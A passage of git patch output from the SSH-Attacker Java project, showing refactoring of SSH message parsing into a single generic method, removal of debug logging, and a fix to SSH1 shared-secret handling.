readMessageFromStream(new HybridKeyExchangeReplyMessage(), (BinaryPacket) packet); return; case SSH_MSG_SERVICE_REQUEST: - LOGGER.debug("[bro] parsing SSH_MSG_SERVICE_REQUEST Message"); - readServiceRequestData((BinaryPacket) packet); + readMessageFromStream(new ServiceRequestMessage(), (BinaryPacket) packet); return; case SSH_MSG_KEX_ECDH_INIT: - LOGGER.debug("[bro] parsing SSH_MSG_KEX_ECDH_INIT Message"); - readKexECDHInit((BinaryPacket) packet); + readMessageFromStream(new EcdhKeyExchangeInitMessage(), (BinaryPacket) packet); return; case SSH_MSG_KEX_ECDH_REPLY: - LOGGER.debug("[bro] parsing SSH_MSG_KEX_ECDH_REPLY Message"); - readKexECDHReply((BinaryPacket) packet); + readMessageFromStream(new EcdhKeyExchangeReplyMessage(), (BinaryPacket) packet); return; case SSH_MSG_ECMQV_INIT: - LOGGER.debug("[bro] parsing SSH_MSG_ECMQV_INIT Message"); return; case SSH_MSG_ECMQV_REPLY: - LOGGER.debug("[bro] parsing SSH_MSG_ECMQV_REPLY Message"); return; case SSH_MSG_KEXRSA_PUBKEY: - LOGGER.debug("[bro] parsing SSH_MSG_KEXRSA_PUBKEY Message"); - readKeyExchangeRSAPubkeyMessage((BinaryPacket) packet); + readMessageFromStream(new RsaKeyExchangePubkeyMessage(), (BinaryPacket) packet); return; case SSH_MSG_KEXRSA_SECRET: - LOGGER.debug("[bro] parsing SSH_MSG_KEXRSA_SECRET Message"); - readKeyExchangeRSASecret((BinaryPacket) packet); + readMessageFromStream(new RsaKeyExchangeSecretMessage(), (BinaryPacket) packet); return; case SSH_MSG_KEXRSA_DONE: - LOGGER.debug("[bro] parsing SSH_MSG_KEXRSA_DONE Message"); - readKeyExchangeRSADone((BinaryPacket) packet); + readMessageFromStream(new RsaKeyExchangeDoneMessage(), (BinaryPacket) packet); return; case SSH_MSG_KEXGSS_INIT: - LOGGER.debug("[bro] parsing SSH_MSG_KEXGSS_INIT Message"); return; case SSH_MSG_KEXGSS_CONTINUE: - LOGGER.debug("[bro] parsing SSH_MSG_KEXGSS_CONTINUE Message"); return; case SSH_MSG_KEXGSS_COMPLETE: - LOGGER.debug("[bro] parsing SSH_MSG_KEXGSS_COMPLETE Message"); return; case SSH_MSG_KEXGSS_HOSTKEY: - LOGGER.debug("[bro] parsing SSH_MSG_KEXGSS_HOSTKEY Message"); return; case SSH_MSG_KEXGSS_ERROR: - LOGGER.debug("[bro] parsing SSH_MSG_KEXGSS_ERROR Message"); return; case SSH_MSG_KEXGSS_GROUPREQ: - LOGGER.debug("[bro] parsing SSH_MSG_KEXGSS_GROUPREQ Message"); return; case SSH_MSG_KEXGSS_GROUP: - LOGGER.debug("[bro] parsing SSH_MSG_KEXGSS_GROUP Message"); return; case SSH_MSG_USERAUTH_REQUEST: - LOGGER.debug("[bro] parsing SSH_MSG_USERAUTH_REQUEST Message"); readUserAuthReq((BinaryPacket) packet); return; case SSH_MSG_USERAUTH_FAILURE: - LOGGER.debug("[bro] parsing SSH_MSG_USERAUTH_FAILURE Message"); - readUserAuthFail((BinaryPacket) packet); + readMessageFromStream(new UserAuthFailureMessage(), (BinaryPacket) packet); return; case SSH_MSG_USERAUTH_SUCCESS: - LOGGER.debug("[bro] parsing SSH_MSG_USERAUTH_SUCCESS Message"); - readUserAuthSucc((BinaryPacket) packet); + readMessageFromStream(new UserAuthSuccessMessage(), (BinaryPacket) packet); return; case SSH_MSG_USERAUTH_BANNER: - LOGGER.debug("[bro] parsing SSH_MSG_USERAUTH_BANNER Message"); - readUserAuthBanner((BinaryPacket) packet); + readMessageFromStream(new UserAuthBannerMessage(), (BinaryPacket) packet); return; case SSH_MSG_USERAUTH_PK_OK: - LOGGER.debug("[bro] parsing SSH_MSG_USERAUTH_PK_OK Message"); return; case SSH_MSG_USERAUTH_PASSWD_CHANGEREQ: - LOGGER.debug("[bro] parsing SSH_MSG_USERAUTH_PASSWD_CHANGEREQ Message"); return; case SSH_MSG_USERAUTH_INFO_REQUEST: - LOGGER.debug("[bro] parsing SSH_MSG_USERAUTH_INFO_REQUEST Message"); - readUserAuthInfoReq((BinaryPacket) packet); + readMessageFromStream(new UserAuthInfoRequestMessage(), (BinaryPacket) packet); return; case SSH_MSG_USERAUTH_INFO_RESPONSE: - LOGGER.debug("[bro] parsing SSH_MSG_USERAUTH_INFO_RESPONSE Message"); - readUserAuthInfoResp((BinaryPacket) packet); + readMessageFromStream(new UserAuthInfoResponseMessage(), (BinaryPacket) packet); return; case SSH_MSG_USERAUTH_GSSAPI_RESPONSE: - LOGGER.debug("[bro] parsing SSH_MSG_USERAUTH_GSSAPI_RESPONSE Message"); return; case SSH_MSG_USERAUTH_GSSAPI_TOKEN: - LOGGER.debug("[bro] parsing SSH_MSG_USERAUTH_GSSAPI_TOKEN Message"); return; case SSH_MSG_USERAUTH_GSSAPI_EXCHANGE_COMPLETE: - LOGGER.debug("[bro] parsing SSH_MSG_USERAUTH_GSSAPI_EXCHANGE_COMPLETE Message"); return; case SSH_MSG_USERAUTH_GSSAPI_ERROR: - LOGGER.debug("[bro] parsing SSH_MSG_USERAUTH_GSSAPI_ERROR Message"); return; case SSH_MSG_USERAUTH_GSSAPI_ERRTOK: - LOGGER.debug("[bro] parsing SSH_MSG_USERAUTH_GSSAPI_ERRTOK Message"); return; case SSH_MSG_USERAUTH_GSSAPI_MIC: - LOGGER.debug("[bro] parsing SSH_MSG_USERAUTH_GSSAPI_MIC Message"); return; case SSH_MSG_GLOBAL_REQUEST: - LOGGER.debug("[bro] parsing SSH_MSG_GLOBAL_REQUEST Message"); readGlobalRequest((BinaryPacket) packet); return; case SSH_MSG_REQUEST_SUCCESS: - LOGGER.debug("[bro] parsing SSH_MSG_REQUEST_SUCCESS Message"); - readRequestSuccess((BinaryPacket) packet); + readMessageFromStream(new GlobalRequestSuccessMessage(), (BinaryPacket) packet); return; case SSH_MSG_REQUEST_FAILURE: - LOGGER.debug("[bro] parsing SSH_MSG_REQUEST_FAILURE Message"); - readRequestFailure((BinaryPacket) packet); + readMessageFromStream(new GlobalRequestFailureMessage(), (BinaryPacket) packet); return; case SSH_MSG_CHANNEL_OPEN: - LOGGER.debug("[bro] parsing SSH_MSG_CHANNEL_OPEN Message"); readChannelOpen((BinaryPacket) packet); return; case SSH_MSG_CHANNEL_OPEN_CONFIRMATION: - LOGGER.debug("[bro] parsing SSH_MSG_CHANNEL_OPEN_CONFIRMATION Message"); - readChannelOpenConfirmation((BinaryPacket) packet); + readMessageFromStream(new ChannelOpenConfirmationMessage(), (BinaryPacket) packet); return; case SSH_MSG_CHANNEL_OPEN_FAILURE: - LOGGER.debug("[bro] parsing SSH_MSG_CHANNEL_OPEN_FAILURE Message"); - readChannelOpenFailureMessage((BinaryPacket) packet); + readMessageFromStream(new ChannelOpenFailureMessage(), (BinaryPacket) packet); return; case SSH_MSG_CHANNEL_WINDOW_ADJUST: - LOGGER.debug("[bro] parsing SSH_MSG_CHANNEL_WINDOW_ADJUST Message"); - readChannelWindowsAdjust((BinaryPacket) packet); + readMessageFromStream(new ChannelWindowAdjustMessage(), (BinaryPacket) packet); return; case SSH_MSG_CHANNEL_DATA: - LOGGER.debug("[bro] parsing SSH_MSG_CHANNEL_DATA Message"); - readChannelDataMessage((BinaryPacket) packet); + readMessageFromStream(new ChannelDataMessage(), (BinaryPacket) packet); return; case SSH_MSG_CHANNEL_EXTENDED_DATA: - LOGGER.debug("[bro] parsing SSH_MSG_CHANNEL_EXTENDED_DATA Message"); - readChannelExtendedDataMessage((BinaryPacket) packet); + readMessageFromStream(new ChannelExtendedDataMessage(), (BinaryPacket) packet); return; case SSH_MSG_CHANNEL_EOF: - LOGGER.debug("[bro] parsing SSH_MSG_CHANNEL_EOF Message"); - readChannelCloseMessage((BinaryPacket) packet); + readMessageFromStream(new ChannelEofMessage(), (BinaryPacket) packet); return; case SSH_MSG_CHANNEL_CLOSE: - LOGGER.debug("[bro] parsing SSH_MSG_CHANNEL_CLOSE Message"); - readChannelCloseMessage((BinaryPacket) packet); + readMessageFromStream(new ChannelCloseMessage(), (BinaryPacket) packet); return; case SSH_MSG_CHANNEL_REQUEST: - LOGGER.debug("[bro] parsing SSH_MSG_CHANNEL_REQUEST Message"); readChannelRequest((BinaryPacket) packet); return; case SSH_MSG_CHANNEL_SUCCESS: - LOGGER.debug("[bro] parsing SSH_MSG_CHANNEL_SUCCESS Message"); - readChannelSuccessMessage((BinaryPacket) packet); + readMessageFromStream(new ChannelSuccessMessage(), (BinaryPacket) packet); return; case SSH_MSG_CHANNEL_FAILURE: - LOGGER.debug("[bro] parsing SSH_MSG_CHANNEL_FAILURE Message"); - readChannelFailureMessage((BinaryPacket) packet); + readMessageFromStream(new ChannelFailureMessage(), (BinaryPacket) packet); return; case UNKNOWN: - LOGGER.debug("[bro] parsing UNKNOWN Message"); return; default: LOGGER.debug( @@ -739,308 +678,7 @@ private void readASCIIData(AbstractPacket packet) { readContainerFromStream(message, context, temp_stream); } - private void readIngoreMessage(AbstractPacket packet) { - ChannelSuccessMessage message = new ChannelSuccessMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readKexECDHInit(AbstractPacket packet) { - EcdhKeyExchangeInitMessage message = new EcdhKeyExchangeInitMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readKexECDHReply(AbstractPacket packet) { - EcdhKeyExchangeReplyMessage message = new EcdhKeyExchangeReplyMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readChannelSuccessMessage(AbstractPacket packet) { - ChannelSuccessMessage message = new ChannelSuccessMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readChannelCloseMessage(AbstractPacket packet) { - ChannelCloseMessage message = new ChannelCloseMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readChannelEofMessage(AbstractPacket packet) { - ChannelEofMessage message = new ChannelEofMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readChannelExtendedDataMessage(AbstractPacket packet) { - ChannelExtendedDataMessage message = new ChannelExtendedDataMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readChannelFailureMessage(AbstractPacket packet) { - ChannelFailureMessage message = new ChannelFailureMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readChannelOpenFailureMessage(AbstractPacket packet) { - ChannelOpenFailureMessage message = new ChannelOpenFailureMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readChannelOpenConfirmation(AbstractPacket packet) { - ChannelOpenConfirmationMessage message = new ChannelOpenConfirmationMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readUserAuthSucc(AbstractPacket packet) { - UserAuthSuccessMessage message = new UserAuthSuccessMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readDisconnect(AbstractPacket packet) { - DisconnectMessage message = new DisconnectMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readGexDHExchangeOldRequest(AbstractPacket packet) { - DhGexKeyExchangeOldRequestMessage message = new DhGexKeyExchangeOldRequestMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readGexKeyExchangeGroup(AbstractPacket packet) { - DhGexKeyExchangeGroupMessage message = new DhGexKeyExchangeGroupMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readGexDHExchangeRequest(AbstractPacket packet) { - DhGexKeyExchangeRequestMessage message = new DhGexKeyExchangeRequestMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readUserAuthFail(AbstractPacket packet) { - UserAuthFailureMessage message = new UserAuthFailureMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readGexDHExchangeInitMessage(AbstractPacket packet) { - DhGexKeyExchangeInitMessage message = new DhGexKeyExchangeInitMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readDhKeyInitMessage(AbstractPacket packet) { - DhKeyExchangeInitMessage message = new DhKeyExchangeInitMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readDhKeyReplyMessage(AbstractPacket packet) { - DhKeyExchangeReplyMessage message = new DhKeyExchangeReplyMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readGexDHExchangeReplyMessage(AbstractPacket packet) { - DhGexKeyExchangeReplyMessage message = new DhGexKeyExchangeReplyMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readKeyExchangeRSAPubkeyMessage(AbstractPacket packet) { - RsaKeyExchangePubkeyMessage message = new RsaKeyExchangePubkeyMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readKeyExchangeRSASecret(AbstractPacket packet) { - RsaKeyExchangeSecretMessage message = new RsaKeyExchangeSecretMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readKeyExchangeRSADone(AbstractPacket packet) { - RsaKeyExchangeDoneMessage message = new RsaKeyExchangeDoneMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readUserAuthBanner(AbstractPacket packet) { - UserAuthBannerMessage message = new UserAuthBannerMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readUserAuthInfoReq(AbstractPacket packet) { - UserAuthInfoRequestMessage message = new UserAuthInfoRequestMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readUserAuthInfoResp(AbstractPacket packet) { - UserAuthInfoResponseMessage message = new UserAuthInfoResponseMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readRequestSuccess(AbstractPacket packet) { - GlobalRequestSuccessMessage message = new GlobalRequestSuccessMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readRequestFailure(AbstractPacket packet) { - GlobalRequestFailureMessage message = new GlobalRequestFailureMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readChannelWindowsAdjust(AbstractPacket packet) { - ChannelWindowAdjustMessage message = new ChannelWindowAdjustMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readChannelDataMessage(AbstractPacket packet) { - ChannelDataMessage message = new ChannelDataMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readServiceRequestData(AbstractPacket packet) { - ServiceRequestMessage message = new ServiceRequestMessage(); + private void readMessageFromStream(ProtocolMessage message, AbstractPacket packet) { HintedInputStream temp_stream; temp_stream = @@ -1083,56 +721,6 @@ private void readChannelOpen(AbstractPacket packet) { } } - private void readMsgServiceAccept(AbstractPacket packet) { - ServiceAcceptMessage message = new ServiceAcceptMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readHbrReplProtocolData(AbstractPacket packet) { - HybridKeyExchangeReplyMessage message = new HybridKeyExchangeReplyMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readNewKeysProtocolData(AbstractPacket packet) { - NewKeysMessage message = new NewKeysMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readKexInitProtocolData(AbstractPacket packet) { - KeyExchangeInitMessage message = new KeyExchangeInitMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readHbrInitProtocolData(AbstractPacket packet) { - HybridKeyExchangeInitMessage message = new HybridKeyExchangeInitMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - private void readVersionExchangeProtocolData(AbstractPacket packet) { VersionExchangeMessage message = new VersionExchangeMessage(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java index f9ebbd004..093bb9f5b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java @@ -288,7 +288,7 @@ public void decrypt(BinaryPacket packet) throws CryptoException { isEncryptThenMac() ? 0 : BinaryPacketConstants.PACKET_FIELD_LENGTH); packet.setPaddingLength(parser.parseByteField(BinaryPacketConstants.PADDING_FIELD_LENGTH)); - LOGGER.debug("[bro] Padding Lenght:" + packet.getPaddingLength().getValue().intValue()); + LOGGER.debug("Padding Lenght:" + packet.getPaddingLength().getValue().intValue()); packet.setCompressedPayload( parser.parseByteArrayField( packet.getLength().getValue() diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketSsh1Cipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketSsh1Cipher.java index 18643c840..8efb23f94 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketSsh1Cipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketSsh1Cipher.java @@ -73,9 +73,6 @@ private void calculateCrcChecksum(BinaryPacketSSHv1 binaryPacket) { @Override public void encrypt(BinaryPacketSSHv1 packet) { - - LOGGER.debug("Encrypting the Packet now really"); - packet.setLength( packet.getCompressedPayload().getValue().length + 4); // +4 for CRC-Checksum @@ -186,12 +183,8 @@ private void encryptInner(AbstractPacket packet) throws CryptoException { byte[] plainData; if (packet instanceof BinaryPacket) { plainData = ((BinaryPacket) packet).getComputations().getPlainPacketBytes().getValue(); - LOGGER.debug( - "PlainData from Computation: {}", ArrayConverter.bytesToHexString(plainData)); } else { plainData = packet.getCompressedPayload().getValue(); - LOGGER.debug( - "PlainData from Compression: {}", ArrayConverter.bytesToHexString(plainData)); } if (encryptionAlgorithm.getIVSize() > 0) { @@ -395,8 +388,6 @@ private void decryptInner(AbstractPacket packet) throws CryptoException { } } computations.setPlainPacketBytes(plainData); - LOGGER.debug("DEBUGGING NOW HIER {}", ArrayConverter.bytesToHexString(plainData)); - ModifiableByteArray plain_modifialbel = new ModifiableByteArray(); plain_modifialbel.setOriginalValue(plainData); packet.setPayload(plain_modifialbel); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java index e779d115b..1dd089239 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java @@ -163,14 +163,11 @@ private void parseEAMPacket(BinaryPacket binaryPacket) throws CryptoException { */ int blockSize = activeDecryptCipher.getEncryptionAlgorithm().getBlockSize(); - LOGGER.debug("Blocksize is: {}", blockSize); - int decryptedByteCount = 0; // Loop required for stream cipher support (effective block length is 1 in this case) byte[] firstBlock = new byte[0]; byte[] firstBlockEncrypted = new byte[0]; do { - LOGGER.debug("Blocksize 2 is: {}", blockSize); byte[] block = parseByteArrayField(blockSize); byte[] decryptedBlock; if (activeDecryptCipher.getEncryptionAlgorithm().getIVSize() > 0) { @@ -181,24 +178,16 @@ private void parseEAMPacket(BinaryPacket binaryPacket) throws CryptoException { } else { decryptedBlock = activeDecryptCipher.getCipher().decrypt(block); } - LOGGER.debug("Decryption Succesfull"); firstBlock = ArrayConverter.concatenate(firstBlock, decryptedBlock); firstBlockEncrypted = ArrayConverter.concatenate(firstBlockEncrypted, block); decryptedByteCount += blockSize; } while (decryptedByteCount < BinaryPacketConstants.LENGTH_FIELD_LENGTH); - LOGGER.debug("DONE with Loop"); computations.setPlainPacketBytes(firstBlock, true); binaryPacket.setLength( ArrayConverter.bytesToInt( Arrays.copyOfRange( firstBlock, 0, BinaryPacketConstants.LENGTH_FIELD_LENGTH))); - - LOGGER.debug( - "Ciphertext Size: {}, first block: {}", - binaryPacket.getLength().getValue(), - blockSize); - binaryPacket.setCiphertext( Bytes.concat( firstBlockEncrypted, @@ -206,13 +195,6 @@ private void parseEAMPacket(BinaryPacket binaryPacket) throws CryptoException { binaryPacket.getLength().getValue() - (firstBlockEncrypted.length - BinaryPacketConstants.LENGTH_FIELD_LENGTH)))); - - LOGGER.debug( - "Ciphertext is: {} in lenght {}", - ArrayConverter.bytesToRawHexString(binaryPacket.getCiphertext().getValue()), - binaryPacket.getCiphertext().getValue().length); - - LOGGER.debug("Mac Size: {}", activeDecryptCipher.getMacAlgorithm().getOutputSize()); binaryPacket.setMac( parseByteArrayField(activeDecryptCipher.getMacAlgorithm().getOutputSize())); } From 50e219b78cf3f5457fc2a8cde6016c1c4f83476f Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Thu, 29 Feb 2024 15:30:28 +0100 Subject: [PATCH 152/176] fixing shared secret management in ssh1 --- .../ssh1/preparator/ClientSessionKeyMessagePreparator.java | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java index 81e06abc7..ac1d36a5e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java @@ -81,6 +81,7 @@ private void prepareSessionKey() throws CryptoException { // byte[] plainSessionKey = sessionKey.clone(); byte[] plainSessionKey = getObject().getPlaintextSessioKey().getValue(); + byte[] sharedSecret = plainSessionKey.clone(); LOGGER.debug( "Original plain Session Key is: {}", ArrayConverter.bytesToRawHexString(sessionKey)); @@ -151,7 +152,11 @@ private void prepareSessionKey() throws CryptoException { getObject().setEncryptedSessioKey(sessionKey); chooser.getContext().getSshContext().setSessionKey(plainSessionKey); - chooser.getContext().getSshContext().setSharedSecret(plainSessionKey); + chooser.getContext().getSshContext().setSharedSecret(sharedSecret); + LOGGER.info( + "Shared Secret should be: {}", + ArrayConverter.bytesToRawHexString( + chooser.getContext().getSshContext().getSharedSecret().orElseThrow())); } @Override From 8f43539f44ae6cebf02bf3fffb55b7627b3731f4 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Thu, 29 Feb 2024 15:30:43 +0100 Subject: [PATCH 153/176] build cleanup --- .../authentication/parser/UserAuthBannerMessageParser.java | 2 +- .../authentication/parser/UserAuthHostbasedMessageParser.java | 2 +- .../parser/UserAuthInfoResponseMessageParser.java | 1 - .../authentication/parser/UserAuthNoneMessageParser.java | 1 - 4 files changed, 2 insertions(+), 4 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthBannerMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthBannerMessageParser.java index 08873ff22..bff76c102 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthBannerMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthBannerMessageParser.java @@ -19,7 +19,7 @@ public class UserAuthBannerMessageParser extends SshMessageParser Date: Thu, 29 Feb 2024 22:15:27 +0100 Subject: [PATCH 154/176] Move execute action to the correct position --- .../workflow/DefaultWorkflowExecutor.java | 23 ------------- .../core/workflow/WorkflowExecutor.java | 33 ++++++++++++++----- 2 files changed, 25 insertions(+), 31 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/DefaultWorkflowExecutor.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/DefaultWorkflowExecutor.java index c7d39c1ea..49891bd94 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/DefaultWorkflowExecutor.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/DefaultWorkflowExecutor.java @@ -92,29 +92,6 @@ && isDisconnectMessageReceived())) { } } - protected void executeAction(SshAction action, State state) throws SkipActionException { - try { - action.execute(state); - } catch (WorkflowExecutionException ex) { - LOGGER.error("Fatal error during action execution, stopping execution: ", ex); - state.setExecutionException(ex); - throw ex; - } catch (UnsupportedOperationException - | PreparationException - | ActionExecutionException ex) { - state.setExecutionException(ex); - LOGGER.warn("Not fatal error during action execution, skipping action: " + action, ex); - throw new SkipActionException(ex); - } catch (Exception ex) { - LOGGER.error( - "Unexpected fatal error during action execution, stopping execution: ", ex); - state.setExecutionException(ex); - throw new WorkflowExecutionException(ex); - } finally { - state.setEndTimestamp(System.currentTimeMillis()); - } - } - private boolean isDisconnectMessageReceived() { for (Context context : state.getAllContexts()) { if (context.getSshContext().isDisconnectMessageReceived()) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java index dbef926f9..0475a73bf 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java @@ -8,12 +8,11 @@ package de.rub.nds.sshattacker.core.workflow; import de.rub.nds.sshattacker.core.config.Config; -import de.rub.nds.sshattacker.core.exceptions.ConfigurationException; -import de.rub.nds.sshattacker.core.exceptions.TransportHandlerConnectException; -import de.rub.nds.sshattacker.core.exceptions.WorkflowExecutionException; +import de.rub.nds.sshattacker.core.exceptions.*; import de.rub.nds.sshattacker.core.layer.LayerStackFactory; import de.rub.nds.sshattacker.core.state.Context; import 